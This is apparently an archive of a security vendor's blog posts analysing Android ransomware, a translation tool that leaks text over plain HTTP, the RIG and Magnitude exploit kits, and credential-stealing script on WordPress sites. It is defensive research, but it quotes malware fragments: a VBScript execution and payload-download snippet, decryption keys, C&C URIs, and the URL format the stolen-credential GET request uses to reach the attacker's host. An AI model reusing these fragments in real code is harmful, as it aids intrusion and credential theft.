Thursday, May 28, 2015

Android Ransomware - Porn Droid

Recently, we came across a new variant of Porn Droid - an Android ransomware variant claiming to be from the FBI, which accuses people of watching child porn and then demands a fine of USD 500.

File information:
  • Dropped URL : hxxp://sbqujqosyw[.][.]apk
  • MD5 : 857b887982f11493b4a1db953161e627
  • Virustotal Detection : 5/56
It initially appears to the user as if they are downloading a pornographic video, but once the user clicks on the file, it masquerades as the Google patch update and tricks the user into installing the application.
Disguise as patch application
After clicking "Continue", the malware asks for administrator access to the device requesting permissions such as "Erase all data", "Set storage encryption", "Change the screen-unlock password" as shown in screenshot below.
Admin access
Once the user clicks on the "ACTIVATE" button, the malware gets administrator control of the device and locks it while displaying a fake FBI warning as seen below. It locks the user's phone by disabling keyguard and sets top priority for the malware application which ensures that no other application or user activity can override the malware application's activity.

FBI warning message
FBI warning - Payment tab
FBI warning screen with user information
The FBI warning screen also contains dynamic information relevant to the infected device such as the browser history, IMEI number, phone number and victim's picture, which has been taken by the malicious app. This is done to intimidate the end user as a warning message suggests that the information will be used by the FBI to identify the user if the fine is not paid.

Porn Droid Static Analysis

The screenshot below shows the malicious app accessing the browser history and bookmarks to display on the ransom screen. 

Browser history
It then appends the hard coded fake FBI warning message asking for ransom.

Ransom screen text code
The code below shows the malware author's attempt to evade string pattern matching based antivirus (AV) heuristic detection by leveraging a string concatenate function. This is one of the reasons why this sample has a very low (5/56) AV detection rate at the time of our analysis.

"concate" usage to evade AV detection
Another unique functionality that we observed in this mobile ransomware, that we more commonly see in PC malware, involves checking for the presence of installed AV applications such as ESET, Avast and DrWeb. It then attempts to terminate any AV applications identified.

AV Application check & terminate
In order to stay active on the screen and lock out the phone, it disables the keyguard so the user cannot exit the application.

Disable keyguard
We also observed the following commands that the malicious app may receive from a remote server:
  • destroy - wipe all user data
  • unlock - deactivate the Admin access and unlock the device
The app is also capable of taking pictures using the front facing camera  that it can then display on the ransom screen:

Front facing camera picture
The malware's Command & Control (C&C) server information is hardcoded in the configuration class as seen below.

Bot configuration
C&C message parameters
  • Server :  ""
  • URI:  "/pafumokat/bloqyxpn.php"
  • paramString1 : random number in the range of 1 to 3 
  • paramString2 :  String made of BotID, network, location, phone number, bot version, SDK.
  • paramString3 : "Protection"
  • paramStrong4 : "Bot"
Below is a sample C&C POST request that we captured during our analysis:

C&C request
The best way to avoid such malware is to stick with installing Android apps only from 'official' app stores such as Google Play or the Amazon Appstore.

Tuesday, May 26, 2015

Machine Translators May Leak Confidential Information

One challenge for enterprises dealing with confidential information in conjunction with cloud-based systems is that they must exercise due diligence to ensure that it remains confidential. The steps are beyond the scope of a technical blog, but generally it involves making sure that everyone processing the confidential information understands that it is sensitive and has agreed to protect it.

For cloud services like Enterprise Resource Planning (ERP), Human Resources, Video Conferencing and so on, the confidentiality issues are very well understood, but there are exceptions like machine translation. When we think of data leaks, we rightly look primarily to malicious software (worms, viruses, customized zero-days from Advanced Persistent Threats (APT's), etc.) when seeking to prevent confidential data from leaving a network.

Machine translation tools are an interesting member of the “other” category of legitimate tools that can result in confidential data leaks without malicious intent from user or developer. Machine translation tools range from simple web sites like “youdao” pictured above or Google Translate, where it is pretty clear that information is leaving, up to integrated desktop applications, where the movement of data is not nearly as obvious.

The Youdao Dictionary application is installed like any other and operates like any other, except that the translation engine is remote and the application sends it’s lookups in plain text via insecure HTTP GET's. The fact that the translation tool is an application running on a user’s PC, makes it less likely that the person making use of it would realize that they are leaking information because the appearance is that their computer is doing the translation, not a web site.

In the above dissection of a URL retrieved by the tool, we see the word “information” being queried in the “q” field, but it could just as well be that someone isn't entirely sure what “Лечение герпеса Боба Джонса не будет хорошо” means, and would highlight it and click translate. That act results in the application enerating something similar to the plaintext query above, except with that chunk of Russian. The user will then learn that the string translates to “Bob Jones' herpes treatment is not going well.” Unfortunately, the request and the translation are transferred in plaintext form, which can be learned by passive interception.

The application that we use as an example is from Youdao (有道), a major Chinese Internet company that, according to Wikipedia (, ships an offline and free online version of their translation tool. Through some limited experimentation, Youdao's site does seem to support the same functionality over the more secure, encrypted HTTPS protocol. We have observed insecure communication in the wild for versions ranging from 2.2.16 to 5.4.43, but it would be unfair to discuss the tool without looking at the latest version. The latest version of the Youdao tool we could find, version, was downloaded from and tested on a Windows 7 machine and there was no significant difference in behavior.

Our test version also makes use of plaintext (HTTP) communication by default and appears to automatically translate whatever word is near the mouse pointer, whenever it stops moving, between Chinese and English. It also has an option where a small button appears that you can click (or hover over) to translate a highlighted piece of text. Having used the program, it is easy to imagine why this tool is popular with users who need to translate between Chinese and English. In addition to the translation features, it also keeps users from being bored by providing extra advertisements.

What the tool provides in features, it definitely does not provide in security – while it works as intended and does not appear to be up to anything overtly nefarious, it still sends all the translation requests via the insecure HTTP protocol to a back-end server where the translation takes place.


The conclusion for customers is simple: translation software might send data to networks / systems outside your realm of control – if it does, then exactly as would be the case for a cloud-based ERP or Human Resources system, it is important to know where it goes, how it gets there, and that the third parties processing the information do so in a manner that is compatible with your organization's policies and contractual obligations. Given that the messages to be translated are sent in clear text, anyone on the same network could easily intercept the communication by sniffing network traffic. Translated content could range from benign phrases to highly sensitive information.

Questions to which we do not yet have answers, like whether the translation can be “paused,” if HTTPS can be enabled through configuration, if Youdao's privacy policy prevents disclosure, if any HTTPS functionality is implemented securely, etc. should be answered before deploying YoudaoDict or similar cloud-based translation tools in a confidential setting. Naturally, we would recommend to Youdao that they at least make use of HTTPS by default in future releases of their software, due to the risk of inadvertently disclosing their users' confidential information.


The following experiment was performed to verify whether traffic is still passed in plaintext HTTP GET requests, as it was in previous versions. The setup is a fake letter being written in notepad by an associate at the law firm of Nerd, Geek, and Spaz, LLP, who are defending a client who is being sued for some reason…

When the two lines were highlighted, a little blue book popped up and hovering over the book results in a translation being executed. That translation is actually performed on a remote server and the following URL is visited by the software:

For convenience, we look at the same URL after decoding it and converting to pretty-printed JSON:

    "username": null, 
    "netloc": "", 
    "vars": {
        "appZengqiang": "0", 
        "vendor": "unknown", 
        "fytype": "AUTO", 
        "keyfrom": "deskdict.screentrans.http.0.stroke", 
        "dogVersion": "1.0", 
        "pos": "-1", 
        "doctype": "xml", 
        "q": "Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise", 
        "le": "eng", 
        "appVer": "", 
        "client": "deskdict", 
        "in": "YoudaoDict", 
        "xmlVersion": "3.2", 
        "proc": "notepad.exe", 
        "id": "8bba3b7bdf465c61b", 
        "scrfrom": "stroke"
    "fragment": "", 
    "scheme": "http", 
    "hostname": "", 
    "params": "", 
    "query": "keyfrom=deskdict.screentrans.http.0.stroke&q=Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&client=deskdict&id=8bba3b7bdf465c61b&vendor=unknown&in=YoudaoDict&appVer=", 
    "path": "/fsearch", 
    "password": null, 
    "port": null

We can see the variables broken apart more easily in the JSON version and the sentence in our screen-shot it clearly visible with “%20” replacing the spaces and “%0A%0D” replacing the end of line. When decoded, the following is the result:

Bill Jones is getting sued for some really embarassing
porn that was found on his work computer.  Please advise

This is the exact content of the highlighted region of the Notepad application. Clearly, the fact that the firm cannot spell “embarassing” correctly could put some egg on their face, making this a potentially very damaging leak. The tool also passes information about the application where the translated text came from, which is indeed “notepad.exe,” version numbers, affiliate identifiers (for companies distributing the program to presumably share in ad revenues,) and other miscellaneous information.

Wednesday, May 20, 2015

RIG Exploit Kit Infection Cycle Analysis


Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle.


In the past, RIG used malvertising and compromised sites to send users to RIG landing pages and we've seen no change in this tactic. Compromised sites leading to RIG usually contain an iframe in the page header that loads a RIG proxy domain, which also contains an iframe leading to the RIG landing page. The full infection cycle is shown in the annotated Fiddler session below.

Fig 1: RIG Infection Cycle

In this example, the compromised site actually contains three different malicious iframes in its header. These iframes correspond to line items 37-39 in Fig 1.

Fig 2: iframes on Compromised Site

Out of the three RIG proxy iframes on the compromised site, only one, sunfuji[.]com, is still redirecting victims to RIG landing pages. Much like the iframe on the compromised site, the RIG proxy page contains an iframe redirecting victims to the actual landing page.

Fig 3: RIG Proxy Redirects to RIG Landing

Note that the RIG proxy is a persistent redirector, which will change the landing page location arbitrarily. Taken at a different time, the same page returned the following result:

Fig 4: RIG Proxy Changed Landing Page

Landing Page

The landing page has multiple consistent attributes, starting with the URI. Every RIG landing page URI starts with a question mark, followed by 171 characters. Two examples are below:
  • four.pavementexpress[.]org/?xH6Af7ieJRvHDIs=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWBrxaIYwMU95LEQOdviwijm7VFJMonk0DRvWcDnrtMU0gbrA
  • trip.slotsbid[.]com/?xniKfredKx_HCYY=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWAqBHbYw1MrcOTEOcz0Aj2yeVBd892zxWA4GMBmL5MVUgbrA
The landing page itself contains three blocks of obfuscated code along with some portions of text from a popular CNET article. The majority of the code is actually a long list of character-delimited strings that are passed to a function that basically splits them on the delimiter and runs 'fromCharCode':

Fig 5: Top of the RIG Landing Page - strings use 't' delimiter

The decode function for each of the three code blocks immediately follows the set of character-delimited strings, as shown in Fig 6.

Fig 6: Decode function for first set of character-delimited strings

The deobfuscated first block of code attempts to detect known virtual machine characteristics and other attributes that might indicate an analysis environment. If anything is found, the next two code blocks are not deobfuscated or executed.

Fig 7: Code block 1 deobfuscated - detect analysis environment

The second code block is a large base64-encoded VBScript segment:

Fig 8: Code block 2 deobfuscated - vbscript

The VBScript is executed from the following code:

 function time() {window.execScript(base64_decode(scriptvar), "VBscript");}setTimeout(time, 3001);  

Once executed, the VBScript exploits CVE-2014-6332, the so-called 'Godmode' exploit (VT detection - 4/57). AV detection tends to be particularly bad on the VBScript even though the code very closely matches the proof of concept originally publicized. There is a good writeup from TrendMicro, which delves into the details of this vulnerability. If exploitation is successful, the encrypted exe is downloaded, decrypted, and executed on the system. The encryption key for the binary is conveniently in cleartext within the VBScript:

      If objHTTP.Status = 200 Then  
           Set objFile = objFSO.CreateTextFile(strSaveTo,True)  
           objFile.Write EnDeCrypt(ByteArray2String(objHTTP.responseBody), "nkiOaWsg")  
      End If  

The third block of code simply serves up a malicious SWF with no secondary obfuscation:

Fig 9: Code block 3 deobfuscated - malicious SWF

This code is almost the same as in other exploit kits, and the URL of the encrypted binary is being passed to the SWF as a parameter. The exploit in this case was CVE-2015-0313, which affects Flash versions prior to, and the exploit code is contained in a script called 'wow.' Detection on VirusTotal shows 10/57, and there are several public writeups on this vulnerability.

Payload #1 - Injector

The binary payload is encrypted with an 8-byte key, which you can guess from the stream or retrieve from the deobfuscated VBScript.

Fig 10: Encrypted Binary - key is 'WsgnkiOa'

VirusTotal detection is a bit better than 50% for this payload at 32/57. The binary file is a Nullsoft Installer self-extracting archive and extracting the archive reveals three files inside:

Fig 11: Extracted Files from EXE

In addition to these three files, another executable 'b8.exe' is dropped. Once the installer finishes dropping files, it loads the DLL (15/55 on VirusTotal) and begins executing functions to read in the other two files. The file '6ag1rqashtwqw1hgqa' contains data XOR'd with the first 10 bytes of the filename, and the decrypted contents reveals several API calls that give us an idea of what will happen next, for example CreateProcessA, WriteProcessMemory, and ResumeThread.

Fig 12: Decrypting file data with filename

Similarly, the 'Stevie Nicks' .m3u is unfortunately not actually a playlist, but instead an encrypted binary that is decrypted by the DLL using the XOR key "ZhmGqqKwXmJiiS7dzjzPyyaTw0PANF".

Fig 13: Decrypting 'Stevie Nicks' playlist binary

VirusTotal detection on the decrypted Stevie Nicks binary is 35/56.  Ultimately, this leads to creating a hollow process of itself (process hollowing - PDF) which then creates an explorer.exe process and injects code to beacon to the Command & Control (C&C) server. Beacons were frequent and used the URI string '/power/logout.php' to POST to the domain ''

Fig 14: C&C Traffic Sample

Other notable activity includes:
  • Copying to 'C:\Program Files\Common Files\Windows Search 5.3.10\<random>.exe'
  • Using the registry for persistence
  • Hooking ZwOpenFile and ZwOpenProcess
  • Clipboard control

Payload #2 - Blue Bot

After quite some time, a second payload is downloaded named 'cfajrs.exe' from '' which beacons to Four URIs were observed:
  • /help/proxy
  • /help/blog
  • /help/botlogger.php
    • Returns div of HTML with "visitors online" (see Fig 15)
  • /help/target
    • Returns 'STOP|STOP|STOP' during analysis (see Fig 16)

Fig 15: /help/botlogger.php response

Fig 16: /help/target response

VirusTotal detection is 41/56 and indicates this is part of BlueBotnet. Looking at the binary, we see it's a .NET executable and uses no obfuscation at all to make decompilation difficult. Looking at the namespace and classes confirms this is called 'Blue_Botnet' and appears to be a DoS tool.

Fig 17: Blue_Botnet Code Overview

One of the more interesting functions is the 'updateTarget' function, which expects a pipe-delimited list of IP, port, and method. There are multiple different methods accepted for the 'target' command: UDP, TCP, SYN, MCBOTALPHA, HTTP, HTTPROXY, PRESS, and STOP.

Fig 18: Blue_Botnet updateTarget Function

To perform its attacks, the bot has a list of 37 different user agent strings to make detection more difficult (paste of user agents); each request uses a different user agent from the list so requests look like they are coming from multiple different clients instead of from the same source. There is an Italian-language theme to the code, both in some of the variable names and in some of the HTTP headers, for example the Accept-Language header in the HTTP attack function shown below.

Fig 19: Blue_Botnet HTTP Attack Function

Interestingly, the response from botlogger.php is not used in the code and the request may simply be a beacon to the server to keep count of infections.


RIG continues to be a popular and effective exploit kit choice and has evolved over the past year, indicating active development. While other exploit kits are moving toward ransomware and adfraud for monetization of infected victims, RIG is apparently not following this trend and still pushes more traditional malware. ThreatLabZ will continue to monitor RIG for any new developments. For a look at the infrastructure supporting RIG, Trustwave has a great post on the topic.

Monday, May 18, 2015

Magnitude Exploit Kit leading to Ransomware via Malvertising

Magnitude Exploit Kit is a malicious exploit package that leverages a victim’s vulnerable browser plugins in order to download a malicious payload to a system.  This technique is known as a drive-by-download attack, which is often leveraged on compromised websites and malicious advertising networks.

We recently found a number of compromised pages following the structure of fake search engine pages. The following sites have been seen to redirect to malicious content:

  • hymedoraw[dot]com/search[dot]php
  • awerdeall[dot]com/search[dot]php
  • index-html[dot]com/
  • joomla-green[dot]com/
  • bestcool-search[dot]com/
  • joyo-search[dot]com/
  • megas-search[dot]com/
  • speeds-search[dot]com/
  • sample-data[dot]com/
  • lazy-summer[dot]com/
  • tundra-search[dot]com/
  • death-tostock[dot]com/
  • adoncorst[dot]com/search[dot]php
  • demo-content[dot]com/
  • enable-bootstrap[dot]com/
  • rospecoey[dot]com/search[dot]php
  • aranfleds[dot]com
  • adoncorst[dot]com/search[dot]php
  • malpithia[dot]com/search[dot]php
  • noutademn[dot]com/search[dot]php
We've also seen a high volume of Malvertising activity leading to Magnitude Exploit Kit hosting sites. The biggest offender of this Malveritising activity is from "" operated by the ad network Sunlight Media, as seen in the list below:
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=Area+Rugs+Cleaning+hotels+for+sale+by+owner
    • b7b6o[dot]y2ff[dot]3b1f767u[dot]dc[dot]3d478d[dot]t97a2as[dot]pdf0q[dot]zf1[dot]eaq6907579[dot]hatentries[dot]in/?17657271747b7e747c2539646e6463727a7671717e7b7e7663723974787a
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=backhoes+for+sale+Granite+Counter+Tops
    • nd4e61i[dot]0fedz[dot]i9390[dot]11f[dot]b8e0[dot]c1i[dot]51aa8a5x[dot]b22n[dot]z1037n6z[dot]rulesreturning[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=direct+tv+dallas+tx+financial+services+companies
    • kfb39c[dot]ec526[dot]k149t[dot]13f44d[dot]gfb9820[dot]q5c[dot]c778eg[dot]c47b0v3diz2[dot]backedmisuse[dot]in/?1567707376797c767e273b666c666170787473737c797c7461703b767a78
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=business+processes+management+Metaire+Construction+Management+Service
    • a19602cr[dot]773a9be[dot]bd407edi[dot]m602f890[dot]wfd6b[dot]eay836h7h[dot]bytessounds[dot]in/?3a485f5c595653595108144943494e5f575b5c5c5356535b4e5f14595557
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=michelin+tire+Shingle+Roofer
    • 0eeda91z[dot]w8cb575d[dot]b8[dot]s247[dot]maf35794i[dot]q9b[dot]yc79p[dot]b[dot]y7siiy61xy[dot]bytessounds[dot]in/?295b4c4f4a45404a421b075a505a5d4c44484f4f404540485d4c074a4644
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=compact+suv+internet+hosting+company
    • u0b49r[dot]b9l[dot]r76783b2i[dot]ce01s[dot]k25o[dot]8f3t[dot]w32[dot]1d1dl[dot]u63g[dot]s45t[dot]xk6z4x0ok4[dot]isessentially[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=hotel+prices+Air+Duct+Cleaning+Service
    • za46[dot]1375623[dot]e53cb4[dot]2014[dot]50ebd[dot]t1c06f[dot]61[dot]y7f8vkub0[dot]safelyinstall[dot]in/?16647370757a7f757d2438656f6562737b7770707f7a7f7762733875797b
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=supercuts+coupons+sales+presentation+equipment
    • 01e717[dot]i06917c[dot]36f5[dot]j056[dot]m66a[dot]176f3f[dot]5ej[dot]p6e[dot]h2xb793w17[dot]safelyinstall[dot]in/?285a4d4e4b44414b431a065b515b5c4d45494e4e414441495c4d064b4745
  • click2.systemaffiliate[dot]com/filter/?keyword=free+latest+accounting+software+Laptops
    • of62b8a[dot]x43f292x[dot]a674q[dot]r5ec03a[dot]y01c9b[dot]f7367u[dot]cgh63008[dot]husbandhides[dot]in/?3f4d5a595c53565c540d114c464c4b5a525e59595653565e4b5a115c5052
  • click2[dot]systemaffiliate[dot]com/filter/?keyword=marine+equipment+and+supply+company+real+esate+hotline
    •  g1812c47[dot]t6060f09l[dot]t74711a[dot]m69131[dot]l88[dot]z874f0h[dot]b88z8j4s31ji[dot]husbandhides[dot]in/?2b594e4d484742484019055852585f4e464a4d4d4247424a5f4e05484446
The Malvertising networks lead to redirector domains utilizing 302 cushioning. Our recent data shows the following redirector domains to have been heavily utilized:

  • paypal-invest[.]net
  • paypal-invest[.]info
  • paypal-invest[.]biz

Following the 302 redirect, Magnitude delivers both a malicious Flash payload as well as a highly obfuscated JavaScript payload (MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow exploit). Once the browser has been exploited, Magnitude proceeds to a new step in the infection cycle where the malware payload would normally be downloaded immediately following exploitation, we are now seeing a shellcode payload being served.

Shellcode being served

The shellcode is a simple payload that utilizes the Windows library ‘urlmon.dll’ to attempt to fetch a list of URLs contained within the shellcode. In the cases we have seen so far, only the first URL results in a payload (CryptoWall 3.0), while the others return no data.

CryptoWall payload download

This is a highly profitable ransomware payload that leverages Bitcoin transactions executed over the Tor Anonymizer to monetize the attack. Threat Actors utilize this method of collection because it can't be reliably traced back to the them. Victims are especially vulnerable to this type of extortion since very few people seem to backup their critical files such as documents and pictures.

CryptoWall decryption instruction

ThreatLabZ has been actively monitoring this Magnitude EK activity and the image below illustrates the transactions we saw for this campaign:

The Green represents Payload activity; The Blue represents Landing Page activity.

As with most threat actors, once they find a location that allows them to host their attacks they tend to stick with it. The lion's share of target IPs seen from our research show that Germany is the biggest hosting location for this activity.

Other countries seen to host this activity: NL (3%) US(2%) JP(2%)

Exploit Kits are evolving to bypass standard security solutions that utilize basic URL filtering techniques. Attackers are utilizing various methods of infection, including malvertising and iFrame injection on compromised pages. Ransomware is a highly profitable, recording up to $33,000 per day at one point. The sophistication of these attacks are on the rise and security leaders need to keep apprised of this maturing illegal market.

Analysis done by Edward Miles & Chris Mannon

Thursday, May 7, 2015

Compromised WordPress sites leaking credentials

Zscaler recently observed a credentials leak campaign on multiple WordPress sites. The compromised sites run backdoor code, which activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. Till now, we have identified only one domain "" which is collecting all the credentials from these compromised sites.

The following is a sample list of WordPress websites compromised through this campaign:

Credential Leakage

When unsuspecting users attempt to login to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page. Below, we walk through the full exploit cycle illustrating how the user credentials are being stolen through this campaign.

Compromised WordPress login page

As part of the WordPress login page, the user is getting served malicious information stealing JavaScript code hosted on “conyouse[.]com”. The obfuscated JavaScript code present in “wp.js” file can be seen here:
Information stealing JavaScript code

The variable “_0xdd75” stores a list of strings which are used dynamically in the JavaScript above.

List of encoded strings
This code is triggered when the user submits their credentials on the login page of the WordPress site.
The form containing the username and password input box has a fixed name as “loginform” in all WordPress sites. The preventDefault event method is used to cancel the submit event for “loginform” entity and execute the alternate code which is present in this file. The login credential string is serialised and encoded in a Base64 format.

Information Stealing JavaScript code

The final data is sent to "conyouse[.]com/scr.js", which is statically stored as one of the strings. The final GET request generated is as shown in the traffic:

GET Request relaying stolen credentials

On decoding the encoded string highlighted above we see that it’s relaying the stolen user credentials using the GET request. The format of this GET request is

"www.conyouse[.]com/scr.js?callback=jQuery<random number>&data=<BASE64_ENCODED_CREDENTIALS>&_=<random number>"

Base64 decoded data string

The complete sequence of action captured is shown in below screenshot.

Complete exploit cycle
The end user is oblivious to the fact that the credentials were leaked to a remote attacker's site as he is redirected to a successful logged in session of WordPress site.

WordPress, being one of the most popular Content Management Systems & Blogging platform, remains an attractive target for cybercriminals due to it's large user base. While the initial vector behind the compromise of the sites listed in this blog is unclear, it is extremely important for the site administrators to keep their WordPress sites patched with latest security updates.

Analysis by - Sameer Patil & Deepen Desai